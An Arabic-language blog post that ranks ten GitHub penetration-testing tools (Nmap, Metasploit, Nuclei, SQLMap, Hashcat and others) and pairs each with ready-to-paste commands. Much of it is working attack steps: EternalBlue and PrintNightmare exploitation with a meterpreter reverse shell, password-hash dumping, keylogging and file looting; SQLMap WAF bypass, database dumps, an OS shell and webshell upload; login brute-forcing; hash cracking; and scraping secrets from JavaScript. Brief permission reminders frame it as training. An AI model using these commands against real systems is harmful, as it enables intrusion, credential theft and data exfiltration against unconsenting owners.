أقسام الوصول السريع (مربع البحث)

أقوى 10 أدوات وشرح مفصل عنها في اختبار الاختراق على GitHub 2026

أقوى 10 أدوات وشرح مفصل عنها في اختبار الاختراق على GitHub 2026

📑 محتويات المقال ▾
  1. 1. ليش هالأدوات مهمة وليش GitHub بالذات؟
  2. 2. 1. Nmap - ملك فحص الشبكات
  3. 3. 2. Metasploit Framework - وحش الاستغلال
  4. 4. 3. Nuclei - الماسح الذكي للثغرات
  5. 5. 4. SQLMap - سلاح حقن قواعد البيانات
  6. 6. 5. Subfinder - كاشف النطاقات الفرعية
  7. 7. 6. Burp Suite Community - مختبر تطبيقات الويب
  8. 8. 7. ffuf - وحش الـ Fuzzing
  9. 9. 8. Hashcat - كاسر كلمات السر
  10. 10. 9. Katana - عنكبوت الويب الذكي
  11. 11. 10. Gobuster - مدمر المسارات المخفية
  12. 12. 🔥 بونص حصري: سكربت Recon أتمتة كامل
  13. 13. 🔥 بونص: روابط GitHub لازم تتابعها
  14. 14. نصائح ذهبية من تجربتي
  15. 15. أسئلة شائعة
  16. 16. خلاصة المقال
السلام عليكم متابعين قناة ومدونة Shadow Hacker، كالعادة راجعلكم اليوم بموضوع جبار وكتير ناس طلبته مني... وهو أقوى 10 أدوات اختبار اختراق على GitHub سنة 2026 مع أكواد استغلال حصرية وحيل عملية من تجربتي الشخصية.

أقوى 10 أدوات وشرح مفصل عنها في اختبار الاختراق على GitHub 2026

بصراحة أنا من النوع اللي بيقضي ساعات بيتصفح مستودعات GitHub ويجرب كل أداة جديدة بتنزل. واليوم مش رح أحكيلكم بس أسماء أدوات... لا، رح أعطيكم أكواد استغلال حقيقية، ثغرات CVE عملية، حيل حصرية ما رح تلاقوها بأي مقال ثاني، وروابط GitHub لكل أداة ومشروع. فخلينا ندخل مع بعض بالتفاصيل.

وخليني أحكيلك ليش سنة 2026 بالتحديد غير أي سنة ثانية. عدد الثغرات المكتشفة هالسنة تجاوز كل التوقعات، وأدوات المصدر المفتوح تطورت بشكل مجنون. فرق زي ProjectDiscovery عم بينزلوا أدوات كل شهر أقوى من اللي قبلها. وكمان مجتمع Bug Bounty انتشر بشكل كبير وصار في منصات عربية كمان. يعني الفرصة موجودة لأي حدا بده يتعلم ويبدأ مشواره بأمن المعلومات.

وإشي مهم كمان... أنا بهالمقال مش رح أكتفي بشرح نظري. كل أداة رح أعطيك أكواد جاهزة تنسخها وتلصقها مباشرة بالتيرمنال. وكمان رح أشاركك ثغرات CVE حقيقية لسا ناس بتستغلها لحد اليوم. والأهم إني رح أحطلك Pipeline كامل بآخر المقال يجمعلك كل الأدوات مع بعض بسكربت واحد.

وبالمناسبة إذا بدك تشوف مستودعات GitHub تانية بتفيدك، شوف مقالنا عن مستودعات GitHub اللي بتجيبلك مصاري.


ليش هالأدوات مهمة وليش GitHub بالذات؟

قبل ما ندخل بالأدوات، خليني أحكيلك ليش GitHub بالتحديد. أول إشي، كل أداة موجودة عليه بتقدر تشوف الكود تبعها بنفسك وتتأكد إنها آمنة. ثاني إشي، المجتمع... لما أداة عليها آلاف النجوم هاد معناته إنو آلاف المختصين بيستخدموها. ثالث إشي، التحديثات المستمرة وخصوصاً لما تنكشف ثغرات جديدة.

أقوى 10 أدوات وشرح مفصل عنها في اختبار الاختراق على GitHub 2026

وأغلب هالأدوات بتقدر تشغلها على Kali Linux أو على هاتفك عن طريق Termux. وإذا مش عارف كيف تبدأ مع Termux، شوف مقالنا الكامل عن تثبيت Termux.

خلص يلا بلا كتر حكي... خلينا نبدأ.

1. Nmap - ملك فحص الشبكات

إذا في أداة وحدة بس بتقدر تاخذها لأي عملية اختبار اختراق، هاي هي Nmap. موجودة من 1997 ولسا لليوم الأداة رقم واحد لاكتشاف الأجهزة والخدمات على الشبكة. فيها محرك NSE فيه أكتر من 600 سكربت جاهز لفحص الثغرات.

أوامر الاستخدام الأساسية:

sudo apt install nmap

# فحص شامل مع OS Detection
nmap -A -T4 192.168.1.0/24

# فحص سريع لكل البورتات
nmap -p- --min-rate 5000 target.com

# فحص ثغرات NSE
nmap --script vuln target.com

🔥 حيلة حصرية: فحص EternalBlue بأمر واحد

هاي حيلة بستخدمها كتير... بدل ما تفحص يدوياً، Nmap عنده سكربت جاهز يكشف ثغرة MS17-010 (EternalBlue) اللي لسا موجودة على آلاف السيرفرات بسنة 2026:

# كشف EternalBlue على شبكة كاملة
nmap -p 445 --script smb-vuln-ms17-010 192.168.1.0/24

# كشف BlueKeep (CVE-2019-0708) - لسا منتشرة!
nmap -p 3389 --script rdp-vuln-ms12-020 192.168.1.0/24

# كشف Log4Shell (CVE-2021-44228)
nmap --script log4shell --script-args log4shell.callback-server=YOUR_IP target.com

وإشي ما حدا بيحكيه... بتقدر تعمل Idle Scan يعني تفحص الهدف من خلال جهاز ثالث عشان ما يعرف مين اللي عم يفحصه:

# Idle Scan - فحص مخفي عبر جهاز وسيط
nmap -sI zombie_ip target_ip

وإشي ما كتير ناس بتحكي عنه... Nmap مش بس للفحص. بتقدر تستخدمه كـ أداة استطلاع كاملة. مثلاً بتقدر تعرف نوع نظام التشغيل، إصدار كل خدمة شغالة، وحتى تكتشف Firewalls وIDS. والسكربتات اللي فيه بتغطي كل إشي من فحص SSL Certificates لحد اكتشاف ثغرات SMB و HTTP. أنا شخصياً بكل مرة ببدأ فيها اختبار اختراق، Nmap أول إشي بشغله. وبنصحك تتعلم كتابة سكربتات NSE مخصصة بلغة Lua لأنها بتعطيك قوة مش عادية بتخصيص الفحص.

ومن تجربتي الشخصية، لقيت ثغرات خطيرة كتير بس من Nmap. مرة كنت أفحص شبكة شركة وطلعلي بورت 9200 مفتوح وهو تبع Elasticsearch بدون أي حماية. يعني كل البيانات مكشوفة عالشبكة. ومرة ثانية لقيت سيرفر FTP بيسمح بـ Anonymous Login وفيه ملفات حساسة. كل هاد من فحص Nmap بسيط.

📦 رابط GitHub: github.com/nmap/nmap — أكتر من 10,000 ⭐

📦 سكربتات NSE إضافية: github.com/vulnersCom/nmap-vulners — بيربط Nmap بقاعدة بيانات Vulners للثغرات

2. Metasploit Framework - وحش الاستغلال

بعد ما لقيت الثغرات بـ Nmap، كيف بتستغلها؟ هون بييجي Metasploit. إطار عمل كامل فيه أكتر من 2,300 استغلال جاهز و 600+ Payload. يعني حرفياً بتقدر تختبر أي نظام بالعالم. وأقوى إشي فيه إنه مش بس استغلال... بعد ما تدخل على النظام عندك عالم كامل من أدوات Post-Exploitation تقدر تجمع فيها كلمات سر وتتحرك بين الأجهزة على الشبكة.

أنا بستخدم Metasploit بشكل يومي تقريباً. والميزة إنه بيتكامل مع قاعدة بيانات PostgreSQL يعني كل نتائج الفحص بتتخزن وبتقدر ترجعلها بأي وقت. وكمان فيه مكتبة Auxiliary Modules للفحص والمسح بدون استغلال، وهاي كتير مفيدة لما بدك تعمل Recon على شبكة كبيرة.

sudo apt install metasploit-framework
msfconsole

🔥 استغلال حصري: EternalBlue كامل خطوة بخطوة

هاد أشهر استغلال بالتاريخ واللي لسا بيشتغل على سيرفرات Windows قديمة ما عملت تحديث:

# استغلال MS17-010 EternalBlue
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.1.100
msf6> set LHOST 192.168.1.50
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> exploit

# بعد ما تحصل على Meterpreter Session:
meterpreter> sysinfo                    # معلومات النظام
meterpreter> hashdump                   # سحب هاشات كلمات السر
meterpreter> screenshot                 # تصوير الشاشة
meterpreter> keyscan_start              # تسجيل ضغطات المفاتيح
meterpreter> download C:\\Users\\*\\Desktop\\*.* /loot/

🔥 حيلة حصرية: استغلال PrintNightmare (CVE-2021-34527)

هاي ثغرة بخدمة Print Spooler على Windows ولسا كتير سيرفرات ما رقّعتها:

# PrintNightmare Exploit
msf6> use exploit/windows/dcerpc/cve_2021_1675_printnightmare
msf6> set RHOSTS target_ip
msf6> set SMBUSER username
msf6> set SMBPASS password
msf6> exploit

وإذا بدك تعرف أكتر عن اكتشاف الثغرات والربح منها، شوف مقالنا عن Bug Bounty.

📦 رابط GitHub: github.com/rapid7/metasploit-framework — أكتر من 34,000 ⭐

📦 استغلالات إضافية: AutoBlue - MS17-010 — استغلال EternalBlue بدون Metasploit

وإشي لازم تعرفه... Metasploit مش بس للمبتدئين. المحترفين بيستخدموه لكتابة استغلالات مخصصة بلغة Ruby. وكمان فيه Msfvenom لتوليد Payloads مشفّرة بتتخطى كتير من برامج الحماية. بس تذكر دايماً إنك بتستخدم هالأدوات على بيئات مصرّح إلك فيها فقط.

3. Nuclei - الماسح الذكي للثغرات

إذا مش سامع عن Nuclei قبل هيك فوت على حالك أداة جبارة. أداة فحص ثغرات مبنية على Templates... كل ثغرة إلها Template خاص والمجتمع بينزل templates جديدة كل يوم. أول ما تنكشف ثغرة Zero-Day بتلاقي Template جاهز إلها خلال ساعات.

والسبب اللي بيخلي Nuclei أقوى من أدوات الفحص التقليدية إنها سريعة بشكل جنوني لأنها مكتوبة بـ Go وبتستخدم goroutines للفحص المتوازي. يعني بتقدر تفحص آلاف الأهداف بوقت قصير. وكمان الـ Templates إلها تصنيفات واضحة حسب الخطورة (critical, high, medium, low, info) وحسب النوع (cve, default-logins, misconfigurations, exposures). هاد بيخليك تركّز على اللي بيهمك.

أنا شخصياً بستخدم Nuclei بكل عملية Bug Bounty وبقدر أحكيلك إنها لقتلي ثغرات ما كنت رح ألاقيها يدوياً. مرة لقيت لوحة تحكم Jenkins مكشوفة على سيرفر شركة كبيرة، ومرة ثانية لقيت ثغرة SSRF بموقع حكومي كلها من Templates جاهزة.

# تثبيت
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# فحص ثغرات خطيرة فقط
nuclei -u https://target.com -severity critical,high

# تحديث Templates
nuclei -update-templates

🔥 حيلة حصرية: فحص ثغرات 2025-2026 بالتحديد

بدل ما تفحص بكل الـ Templates، ركّز على الثغرات الجديدة:


# فحص ثغرات CVE لسنة 2025 و 2026 فقط
nuclei -u target.com -tags cve2025,cve2026

# فحص ثغرات XSS + SQLi + SSRF مع بعض
nuclei -u target.com -tags xss,sqli,ssrf -severity high,critical

# فحص ثغرات WordPress
nuclei -u target.com -tags wordpress,wp-plugin

# فحص Exposed Panels (لوحات تحكم مكشوفة)
nuclei -u target.com -tags panel,login,dashboard

# Pipeline كامل: Subfinder + httpx + Nuclei
subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high -o vulns.txt

🔥 كتابة Template مخصص لثغرة جديدة

هاد الإشي الحصري... بدل ما تستنى المجتمع ينزل Template، اكتب واحد بنفسك. هاد مثال لفحص SSRF:

id: custom-ssrf-check
info:
  name: Custom SSRF Detection
  severity: high
  author: shadowhacker

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/fetch?url=http://169.254.169.254/latest/meta-data/"
      - "{{BaseURL}}/proxy?url=http://127.0.0.1:8080/admin"
      - "{{BaseURL}}/load?page=http://169.254.169.254/"
    matchers:
      - type: word
        words:
          - "ami-id"
          - "instance-id"
          - "iam"

احفظ الملف بامتداد .yaml وشغّله هيك:

nuclei -u target.com -t custom-ssrf-check.yaml

📦 رابط GitHub: github.com/projectdiscovery/nuclei — أكتر من 20,000 ⭐

📦 Templates مجتمعية: github.com/projectdiscovery/nuclei-templates — أكتر من 9,000 Template

4. SQLMap - سلاح حقن قواعد البيانات

ثغرات SQL Injection لسا من أخطر الثغرات بسنة 2026. و SQLMap هي الأداة رقم واحد لاكتشافها واستغلالها تلقائياً. بتدعم كل أنواع الحقن: Boolean-based, Time-based, Error-based, Union-based, Stacked queries.

وخليني أحكيلك ليش SQL Injection لسا خطيرة مع إنها قديمة. السبب إنو كتير مطورين بيستخدموا frameworks قديمة أو بيكتبوا queries يدوياً بدون Prepared Statements. وكمان الـ APIs الحديثة اللي بتستخدم JSON ممكن تكون عرضة لحقن SQL بطرق ما حدا بيتوقعها. SQLMap ذكية كفاية إنها بتكتشف كل هالأنواع تلقائياً وبتجرب عشرات التقنيات للتخطي.

ومن تجربتي، أقوى ميزة بـ SQLMap هي Tamper Scripts. هاي سكربتات بتعدّل على الـ Payloads عشان تتخطى WAF (Web Application Firewall). يعني حتى لو في Cloudflare أو ModSecurity، SQLMap عندها طرق تتخطاها.

git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap

🔥 استغلال حصري: تخطي WAF وسحب قاعدة البيانات كاملة

# فحص أساسي مع اكتشاف تلقائي
python sqlmap.py -u "http://target.com/page?id=1" --dbs

# تخطي WAF بعدة Tamper Scripts مع بعض
python sqlmap.py -u "http://target.com/page?id=1" \
  --tamper=space2comment,between,randomcase \
  --random-agent --level=5 --risk=3 --dbs

# سحب كل الجداول والبيانات
python sqlmap.py -u "http://target.com/page?id=1" -D dbname --dump-all

# الحصول على Shell على السيرفر
python sqlmap.py -u "http://target.com/page?id=1" --os-shell

# قراءة ملفات من السيرفر
python sqlmap.py -u "http://target.com/page?id=1" --file-read="/etc/passwd"

# رفع ملف على السيرفر (Webshell)
python sqlmap.py -u "http://target.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

🔥 حيلة حصرية: حقن POST Request و JSON

كتير ناس بس بتفحص GET Parameters وبتنسى إنو POST و JSON كمان ممكن يكونوا عرضة للحقن:

# حقن POST Data
python sqlmap.py -u "http://target.com/login" --data="user=admin&pass=test" -p user

# حقن JSON Body (APIs)
python sqlmap.py -u "http://target.com/api/search" \
  --data='{"query":"test","page":1}' \
  --headers="Content-Type: application/json" -p query

# حقن عبر Cookie
python sqlmap.py -u "http://target.com/" --cookie="session=abc123" -p session --level=3

# حقن عبر Header (مثل X-Forwarded-For)
python sqlmap.py -u "http://target.com/" \
  --headers="X-Forwarded-For: 1*" --level=5

📦 رابط GitHub: github.com/sqlmapproject/sqlmap — أكتر من 32,000 ⭐

📦 Tamper Scripts إضافية: github.com/0xInfection/Awesome-WAF — مجموعة تقنيات تخطي WAF

ونصيحة مهمة لما تستخدم SQLMap... دايماً ابدأ بـ level 1 و risk 1 عشان تشوف إذا الهدف عرضة للحقن. وإذا ما طلع إشي، ارفع لـ level 3 و risk 2. وإذا لسا ما طلع، جرب مع tamper scripts مختلفة. ولا تنسى تفحص كل أنواع الـ Parameters: GET, POST, Cookies, Headers. كتير ثغرات بتكون مخبية بأماكن ما حدا بيفحصها.

[IMAGE_PLACEHOLDER_2]

5. Subfinder - كاشف النطاقات الفرعية

لما بدك تعمل اختبار اختراق، أول إشي بتعمله هو Recon. والنطاقات الفرعية (Subdomains) هي كنز... لأنو كتير أوقات الموقع الرئيسي محمي بس في Subdomain قديم ناسيينه وفيه ثغرة.

Subfinder بتستخدم أكتر من 30 مصدر (Shodan, Censys, VirusTotal, SecurityTrails) عشان تجمعلك كل النطاقات الفرعية بدون ما تبعث أي طلب للهدف مباشرة.

go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

subfinder -d target.com -o subs.txt

🔥 حيلة حصرية: Recon Pipeline كامل بأمر واحد

هاد الـ Pipeline اللي بستخدمه شخصياً... بجمع الـ Subdomains وبفلترها وبفحصها بأمر واحد:

# الـ Pipeline الذهبي لجمع المعلومات
subfinder -d target.com -silent | \
  httpx -silent -status-code -title -tech-detect | \
  tee alive_subs.txt | \
  grep "200\|301\|403" | \
  awk '{print $1}' | \
  nuclei -severity critical,high -o critical_vulns.txt

# اكتشاف Subdomain Takeover
subfinder -d target.com -silent | httpx -silent | \
  nuclei -tags takeover -o takeovers.txt

🔥 حيلة: اكتشاف Subdomains مخفية بطرق غير تقليدية

# دمج عدة أدوات للحصول على أكبر عدد Subdomains
subfinder -d target.com -o subs1.txt
amass enum -passive -d target.com -o subs2.txt
cat subs1.txt subs2.txt | sort -u > all_subs.txt

# البحث في Certificate Transparency Logs
curl -s "https://crt.sh/?q=%.target.com&output=json" | \
  jq -r '.[].name_value' | sort -u >> all_subs.txt

📦 رابط GitHub: github.com/projectdiscovery/subfinder — أكتر من 10,000 ⭐

📦 أداة مكملة: github.com/owasp-amass/amass — أقوى أداة Recon من OWASP

ونصيحة ذهبية من تجربتي بالـ Recon... ما تعتمد على أداة وحدة لجمع الـ Subdomains. استخدم كذا مصدر مع بعض وادمج النتائج. مرات Subfinder بتلاقي Subdomains ما Amass بتلاقيها والعكس. وكمان جرب تبحث بـ Google Dorks يدوياً عشان تلاقي Subdomains ما أي أداة بتلاقيها. مثلاً: site:*.target.com بتعطيك نتائج مفيدة.

6. Burp Suite Community - مختبر تطبيقات الويب

ما بقدر أحكي عن اختبار اختراق الويب بدون Burp Suite. المعيار الذهبي لاختبار أمن تطبيقات الويب. بتشتغل كـ Proxy بين متصفحك والموقع... كل طلب بيطلع بيمر عبر Burp وبتقدر تشوفه وتعدل عليه.

والإصدار المجاني Community Edition يكفيك للبداية وكتير شغل. بس إذا صرت محترف وبتعمل Bug Bounty بشكل جدي، الإصدار المدفوع Professional بيعطيك Scanner تلقائي بيلاقيلك ثغرات وأنت نايم. وكمان بيعطيك Collaborator Server لاكتشاف ثغرات Out-of-Band زي Blind SSRF و Blind XXE.

واللي بيميّز Burp عن غيره إنه بيخليك تفهم كيف التطبيق بيشتغل من جوّا. بتشوف كل Header وكل Cookie وكل Parameter. وبتقدر تعدل على أي إشي وتبعثه للسيرفر. هاد بيعطيك فهم عميق لما بيصير بين المتصفح والسيرفر وبيخليك تكتشف ثغرات ما أي أداة أوتوماتيكية بتلاقيها.

أهم الأقسام اللي بستخدمها يومياً:

Proxy — لالتقاط وتعديل الطلبات بين المتصفح والسيرفر

Repeater — لإعادة إرسال طلب محدد مع تعديلات ومقارنة النتائج

Intruder — لعمل Brute Force و Fuzzing على أي باراميتر

Decoder — لفك وتشفير البيانات (Base64, URL, Hex وغيرها)

Comparer — لمقارنة استجابتين ومعرفة الفرق

🔥 حيلة حصرية: اكتشاف IDOR بشكل يدوي

هاي من أكتر الثغرات اللي بلاقيها بـ Burp. الفكرة إنك بتغيّر الـ ID بالطلب وبتشوف بيانات مستخدم ثاني:

# الطلب الأصلي (حسابك أنت):
GET /api/user/profile?id=1337 HTTP/2
Authorization: Bearer your_token

# غيّر الـ ID لمستخدم ثاني:
GET /api/user/profile?id=1338 HTTP/2
Authorization: Bearer your_token

# إذا رجعلك بيانات المستخدم الثاني = ثغرة IDOR!

# جرب كمان مع POST:
POST /api/user/delete HTTP/2
{"user_id": "1338"}  ← بدل رقمك حط رقم ثاني

🔥 إضافات Burp لازم تثبتها

Turbo Intruder — بيبعث آلاف الطلبات بثواني (Race Conditions و Rate Limit Bypass)

Logger++ — بيسجل كل الطلبات مع فلاتر متقدمة

JWT Editor — لتعديل وتزوير JWT Tokens

Param Miner — لاكتشاف Hidden Parameters و HTTP Headers

Autorize — لفحص ثغرات Authorization تلقائياً

📦 رابط التحميل: portswigger.net/burp/communitydownload

📦 الأكاديمية المجانية: portswigger.net/web-security — تحديات عملية مجانية

7. ffuf - وحش الـ Fuzzing

ffuf (Fuzz Faster U Fool) — أسرع أداة Web Fuzzing موجودة. مكتوبة بـ Go وبتبحث عن مسارات مخفية، ملفات حساسة، باراميترات مخفية، و Virtual Hosts. أحسن بكتير من dirb و dirbuster.

وليش ffuf أحسن من الأدوات القديمة؟ أول إشي السرعة. ffuf بتبعث مئات الطلبات بالثانية وبتستخدم goroutines عشان تعمل فحص متوازي. ثاني إشي المرونة. بتقدر تعمل Fuzz على أي جزء من الطلب: المسار، الباراميترات، الـ Headers، الـ Cookies، حتى الـ POST Body. وثالث إشي الفلترة الذكية. بتقدر تفلتر النتائج حسب حجم الاستجابة أو عدد الكلمات أو عدد الأسطر أو كود الاستجابة. هاد بيوفر عليك وقت كتير بتنقية النتائج.

go install github.com/ffuf/ffuf/v2@latest

🔥 أكواد حصرية: استخدامات متقدمة لـ ffuf

# البحث عن ملفات Backup حساسة (هاي بتنسرق منها بيانات كتير)
ffuf -u https://target.com/FUZZ -w - -mc 200 << 'EOF'
backup.sql
database.sql.gz
db_backup.tar.gz
.env
config.php.bak
wp-config.php.old
.git/config
.svn/entries
debug.log
error_log
dump.sql
EOF

# البحث عن API Endpoints مخفية
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,301,403

# Brute Force Login مع ffuf
ffuf -u https://target.com/login -X POST \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin&password=FUZZ" \
  -w /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt \
  -fc 401

# اكتشاف Virtual Hosts (Subdomains على نفس السيرفر)
ffuf -u https://target.com -H "Host: FUZZ.target.com" \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -fs 0

📦 رابط GitHub: github.com/ffuf/ffuf — أكتر من 12,000 ⭐

📦 Wordlists ضرورية: github.com/danielmiessler/SecLists — أكبر مجموعة Wordlists للاختراق

8. Hashcat - كاسر كلمات السر

Hashcat أسرع أداة لكسر كلمات السر بالعالم لأنها بتستخدم قوة كرت الشاشة (GPU). بتقدر تجرب مليارات الكلمات بالثانية. بتدعم أكتر من 350 نوع هاش: MD5, SHA256, bcrypt, NTLM, WPA2, Kerberos وغيرها.

وخليني أشرحلك ليش كسر كلمات السر مهم باختبار الاختراق. لما تحصل على هاشات من قاعدة بيانات أو من Active Directory عن طريق hashdump، لازم تحولها لكلمات سر نصية عشان تقدر تدخل على أنظمة ثانية. وكتير ناس بيستخدموا نفس كلمة السر لأكتر من حساب... يعني كلمة سر وحدة ممكن تفتحلك أبواب كتيرة.

والمقارنة بين Hashcat و John the Ripper: Hashcat أسرع بمراحل لأنها بتستخدم GPU، بس John أسهل بالاستخدام وبيشتغل كويس على CPU. أنا بستخدم الاتنين حسب الموقف. لو عندي كارت شاشة قوي بروح على Hashcat، وإذا على سيرفر بدون GPU بروح على John.

sudo apt install hashcat

🔥 أكواد استغلال حصرية لكسر أنواع مختلفة من الهاشات

# كسر MD5 (Mode 0)
hashcat -m 0 -a 0 md5_hashes.txt rockyou.txt

# كسر NTLM من Active Directory (Mode 1000) - هاد أكتر نوع بتواجهه
hashcat -m 1000 ntlm.txt rockyou.txt -r rules/best64.rule

# كسر SHA-256 (Mode 1400)
hashcat -m 1400 sha256.txt rockyou.txt

# كسر bcrypt (Mode 3200) - بطيء بس Rules بتساعد
hashcat -m 3200 bcrypt.txt rockyou.txt -r rules/best64.rule

# كسر WPA2 Handshake (Mode 22000)
hashcat -m 22000 capture.hc22000 rockyou.txt

# كسر Kerberos TGS-REP / Kerberoasting (Mode 13100)
hashcat -m 13100 kerberos.txt rockyou.txt

🔥 حيلة حصرية: Rules ذكية بتكسر 80% من الكلمات

بدل Wordlist عملاقة، استخدم Rules ذكية بتحوّل كل كلمة لعشرات الاحتمالات:

# Rule مخصص (احفظه بملف custom.rule):
c $1 $2
c $2 $0 $2 $6
c $!
c $1 $!
$1 $2 $3
sa@ se3 si1 so0

# تشغيل مع Rule مخصص
hashcat -m 1000 hashes.txt rockyou.txt -r custom.rule

# أقوى Rules الجاهزة
hashcat -m 0 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/dive.rule

📦 رابط GitHub: github.com/hashcat/hashcat — أكتر من 21,000 ⭐

📦 Wordlists ذكية: github.com/berzerk0/Probable-Wordlists — قواميس مبنية من تسريبات حقيقية

9. Katana - عنكبوت الويب الذكي

أداة ثالثة من فريق ProjectDiscovery. Katana بتزحف على المواقع وبتجمع كل الروابط والـ Endpoints والـ JavaScript Files. ميزتها إنها بتدعم Headless Browser يعني بتلاقي Endpoints اللي بيولدها JavaScript والـ API Endpoints المخفية.

والفرق بين Katana وأدوات الزحف القديمة إنها بتفهم JavaScript. يعني لو الموقع مبني بـ React أو Angular أو Vue، الأدوات القديمة ما بتلاقي إشي لأنو كل المحتوى dynamic. بس Katana بتشغل متصفح بالخلفية وبتلاقي كل الـ Endpoints اللي الـ JavaScript بيولدها. وهاد كنز للـ Bug Bounty لأنو كتير APIs مخفية بتنكشف بهالطريقة.

وكمان Katana بتستخرج JavaScript Files اللي فيها ممكن تلاقي API Keys و Tokens وأسرار ثانية. كتير شركات بتحط مفاتيح AWS أو Firebase أو Stripe داخل كود JavaScript ومش حاسين إنها مكشوفة. هاي من أسهل الثغرات اللي بتلاقيها وأعلاها مكافأة.

go install github.com/projectdiscovery/katana/cmd/katana@latest

🔥 حيلة حصرية: استخراج أسرار من JavaScript

كتير تطبيقات ويب بتخبي API Keys و Tokens داخل ملفات JavaScript:

# زحف مع استخراج JavaScript Endpoints
katana -u https://target.com -jc -headless -d 3 -o endpoints.txt

# بعدين ابحث عن أسرار بملفات JS
cat endpoints.txt | grep "\.js$" | while read url; do
  curl -s "$url" | grep -oE \
    "(api[_-]?key|token|secret|password|aws_access)['\"]?\s*[:=]\s*['\"][^'\"]{8,}['\"]"
done

# أو استخدم أداة مخصصة لاستخراج الأسرار
trufflehog filesystem --directory=./js_files/

📦 رابط GitHub: github.com/projectdiscovery/katana — أكتر من 11,000 ⭐

📦 أداة استخراج أسرار: github.com/trufflesecurity/trufflehog — بتلاقي API Keys و Secrets

10. Gobuster - مدمر المسارات المخفية

آخر أداة بقائمتنا. Gobuster مكتوبة بـ Go ومتخصصة بـ Brute Force على مسارات الويب و DNS و Amazon S3 Buckets و Virtual Hosts. أبسط من ffuf وأسرع للفحص المباشر.

وليش حطيت Gobuster مع إنو عندنا ffuf؟ لأنو كل أداة إلها أسلوب مختلف. Gobuster أبسط وأسرع للفحص المباشر... يعني لو بدك تفحص مسارات بسرعة بدون تعقيدات، Gobuster خيارك. وكمان ميزة فحص S3 Buckets ما موجودة بـ ffuf. كتير شركات بتستخدم Amazon S3 لتخزين ملفات وبتنسى تضبط صلاحيات الوصول... وهاد بيخلي ملفات حساسة مكشوفة للعالم كله.

وحيلة حلوة... بتقدر تجمع بين Gobuster و ffuf بنفس العملية. Gobuster للمسح السريع وffuf للتعمق أكتر بالنتائج. مثلاً Gobuster بتلاقيلك مجلد /admin وبعدين ffuf بتفحص جوا هالمجلد بالتفصيل.

go install github.com/OJ/gobuster/v3@latest

🔥 حيلة حصرية: اكتشاف S3 Buckets مفتوحة

# فحص مسارات مع Extensions حساسة
gobuster dir -u https://target.com \
  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
  -x php,asp,aspx,jsp,bak,sql,zip,tar.gz,env,config -t 80

# فحص S3 Buckets مفتوحة
gobuster s3 -w company-names.txt

# فحص DNS Subdomains
gobuster dns -d target.com \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

# فحص مع سرعة عالية وتجاهل الأخطاء
gobuster dir -u https://target.com -w wordlist.txt \
  -t 100 --no-error -b 404,403

📦 رابط GitHub: github.com/OJ/gobuster — أكتر من 10,000 ⭐

📦 بديل قوي: github.com/epi052/feroxbuster — Gobuster بس بـ Rust وأسرع

🔥 بونص حصري: سكربت Recon أتمتة كامل

هاد السكربت اللي بستخدمه شخصياً... بيجمع كل الأدوات بـ Pipeline واحد:

#!/bin/bash
# Shadow Hacker Recon Pipeline v2.0
TARGET=$1
OUTPUT="recon_$TARGET"
mkdir -p $OUTPUT

echo "[1/6] Subdomain Enumeration..."
subfinder -d $TARGET -silent | sort -u > $OUTPUT/subs.txt
echo "    Found: $(wc -l < $OUTPUT/subs.txt) subdomains"

echo "[2/6] Checking Live Hosts..."
cat $OUTPUT/subs.txt | httpx -silent -status-code -title | tee $OUTPUT/alive.txt
cat $OUTPUT/alive.txt | awk '{print $1}' > $OUTPUT/urls.txt

echo "[3/6] Port Scanning..."
nmap -iL $OUTPUT/subs.txt -T4 --top-ports 1000 -oN $OUTPUT/nmap.txt

echo "[4/6] Web Crawling..."
katana -list $OUTPUT/urls.txt -silent -jc | sort -u > $OUTPUT/endpoints.txt

echo "[5/6] Directory Fuzzing..."
for url in $(cat $OUTPUT/urls.txt | head -20); do
  ffuf -u "$url/FUZZ" \
    -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt \
    -mc 200,301,302,403 -t 50 -s >> $OUTPUT/dirs.txt
done

echo "[6/6] Vulnerability Scanning..."
nuclei -l $OUTPUT/urls.txt -severity critical,high -o $OUTPUT/vulns.txt

echo ""
echo "=== RESULTS ==="
echo "Subdomains: $(wc -l < $OUTPUT/subs.txt)"
echo "Live Hosts: $(wc -l < $OUTPUT/urls.txt)"
echo "Endpoints:  $(wc -l < $OUTPUT/endpoints.txt)"
echo "Vulns:      $(wc -l < $OUTPUT/vulns.txt)"
echo "Output Dir: $OUTPUT/"

احفظ السكربت باسم recon.sh وشغله: chmod +x recon.sh && ./recon.sh target.com

وإذا بدك أدوات تانية تضيفها، شوف مقالنا عن أفضل أدوات Termux.

🔥 بونص: روابط GitHub لازم تتابعها

هاي مستودعات حصرية كل واحد كنز:

PayloadsAllTheThings — مكتبة Payloads لكل أنواع الثغرات (XSS, SQLi, SSRF, XXE)

PEASS-ng (LinPEAS/WinPEAS) — سكربتات Privilege Escalation لـ Linux و Windows

h4cker — مرجع شامل لاختبار الاختراق

reconftw — أداة أتمتة Recon كاملة بأمر واحد

Impacket — مكتبة Python لاختراق شبكات Windows و Active Directory

وإذا بدك تستخدم الذكاء الاصطناعي بعمليات الاختبار، شوف مقالنا عن برومبتات الاختراق.

نصائح ذهبية من تجربتي

أول نصيحة... لا تستخدم أي أداة على هدف بدون إذن. سواء Bug Bounty أو اختبار اختراق لشركة، لازم يكون عندك إذن خطي واضح.

ثاني نصيحة... لا تعتمد على أداة وحدة. كل أداة إلها نقاط قوة وضعف... استخدم كذا أداة عشان تغطي أكبر مساحة.

ثالث نصيحة... تعلم يدوي أولاً. قبل ما تشغل الأدوات، افهم كيف الشبكات وHTTP وقواعد البيانات بتشتغل.

